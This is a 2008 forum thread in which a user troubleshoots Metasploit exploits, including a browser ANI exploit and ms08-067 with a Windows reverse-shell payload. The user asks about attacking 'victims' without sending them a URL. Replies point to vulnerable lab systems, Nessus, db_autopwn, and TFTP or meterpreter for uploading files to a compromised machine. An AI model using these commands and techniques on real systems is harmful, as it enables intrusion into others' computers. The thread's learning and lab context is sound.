Author Topic: problem with use MSF  (Read 18321 times)
mr.Z
« on: November 14, 2008, 01:15:15 PM »

I have some problems using Metasploit.

I've tested more exploits but without success. I don't know what the problem is.

Look at this example:

use windows/browser/ani_loadimage_chunksize

set SRVHOST myip

set SRVPORT 8000

set URIPATH nono

set payload windows/shell_reverse_tcp

set LHOST ip victim

>exploit


After that I tested this on OS XP SP with IE 7 and IE 6.

Afterwards it tells me:
  • Sending HTML page to ip:6668...
  • Sending ANI file to ip:6668...

I'm waiting but nothing happens.

>> sessions -l

Active sessions
===============

No active sessions.

What is the problem?

Any ideas?

And can anyone give me some exploits that work on XP SP2 and SP3?

« Last Edit: November 14, 2008, 01:23:38 PM by mr.Z »
BillV
« Reply #1 on: November 14, 2008, 01:45:48 PM »

Sounds like it's not vulnerable.
mr.Z
« Reply #2 on: November 14, 2008, 01:58:36 PM »

Thanks.

But I looked at the targets:

--  ----
 0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

and I tested on 7 PCs, same problem.

BillV
« Reply #3 on: November 14, 2008, 03:29:02 PM »

Just because those are listed as targets, doesn't mean they're vulnerable... just what the exploit can attack.
mr.Z
« Reply #4 on: November 14, 2008, 04:55:02 PM »

OK, thanks.

But can you give me the names of some exploits that work on Windows XP SP1, SP2, SP3 and Vista?

And I want an exploit I can use without sending the URL to the victim.

I'm using MSF under Windows XP.

BillV
« Reply #5 on: November 14, 2008, 10:09:28 PM »

Quote from: mr.Z
I'm using MSF under windows xp

There's your first problem. Run it under Linux.

I can't tell you what exploit to use, it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.
LSOChris
« Reply #6 on: November 14, 2008, 10:26:36 PM »

ms08-067 exploit
mr.Z
« Reply #7 on: November 16, 2008, 01:37:18 PM »

Quote from: BillV
Quote from: mr.Z
I'm using MSF under windows xp

There's your first problem. Run it under Linux.

I can't tell you what exploit to use, it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.

Thanks a lot, now I'm working in Linux and updated MSF.

----
ChrisG

Thanks.

I tested this exploit but it shows me an error message:

  • Started bind handler
  • [-] Exploit failed: The connection timed out (ip-vicitm:4444).
  • Exploit completed, but no session was created.

Why does this not work? What is the problem?

Why was no session created?

Please tell me.

apollo
« Reply #8 on: November 16, 2008, 10:47:54 PM »

You probably aren't vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL Linux (Damn Vulnerable Linux) and start messing around on there. That might get you further in the process. Or install Windows XP without service packs or patches and then Metasploit becomes a lot more interesting.

CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
mr.Z
« Reply #9 on: November 17, 2008, 09:25:08 AM »

Quote from: apollo
You probably aren't vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there. That might get you further in the process. Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.

You are correct, but I want to test on a fully patched Windows XP,
and I have tried a lot, and I saw that if port 445 is open then you can use the ms08-067 exploit, and if the Windows XP is fully patched.

Any more ideas?
BillV
« Reply #10 on: November 17, 2008, 12:37:59 PM »

Quote from: mr.Z
any more Idea?

Yes, I think you need to do more research and studying regarding exploits and how Metasploit works.

I suggest you start here.

BillV
apollo
« Reply #11 on: November 17, 2008, 05:06:25 PM »

I'll be slightly more helpful: if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like Nessus. There is another option for you to Google, which is db_autopwn. If you search for that and you use BackTrack 3, things will get easier for you. If you use this approach for evil, you will get caught; it is EXTREMELY noisy and will have a low success rate. If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.


CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
geekyone
« Reply #12 on: November 17, 2008, 08:05:25 PM »


Quote from: mr.Z
You are correct but I want test on full patch windows xp
and I'm try much and i'm show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch

any more Idea?

Your biggest problem is trying to exploit a fully patched Windows XP box with Metasploit. If you want to learn more about Metasploit and practice pen testing techniques, don't attack a fully patched box in your lab.

Metasploit doesn't have any zero day vulnerabilities included in it (currently), so you are never going to be able to successfully exploit a fully patched box with Metasploit right now. Now if you really want to exploit a fully patched XP box, you should take BillV's suggestion to heart, because that is going to involve getting into zero day vulnerability research, which requires an in-depth understanding of how exploits work. If you want to get into that, I recommend starting by reading Hacking: The Art of Exploitation, 2nd Edition.

CISSP, CEH, GPEN, GCIH, GCFA
mr.Z
« Reply #13 on: November 22, 2008, 01:37:48 PM »

THANK YOU ALL

Now I've installed Windows XP without a service pack

and exploited this Windows.

I'm using the payload
>"windows/shell_reverse_tcp"
>exploit
>Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

But I can't upload any files. I'm using this MSF under Linux.

I tested some commands like this:
>copy /root/xx.txt c:\

but without success. The error message:
>copy /root/xx.txt c:\
The syntax of the command is incorrect

xXxKrisxXx
« Reply #14 on: November 22, 2008, 01:47:51 PM »

If you're getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP server on your Linux box; when requesting the files using tftp, they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp payload and use the upload from there; it's quicker. The meterpreter also has a lot of other useful options as well.

OSCP, OWSP, eCPPT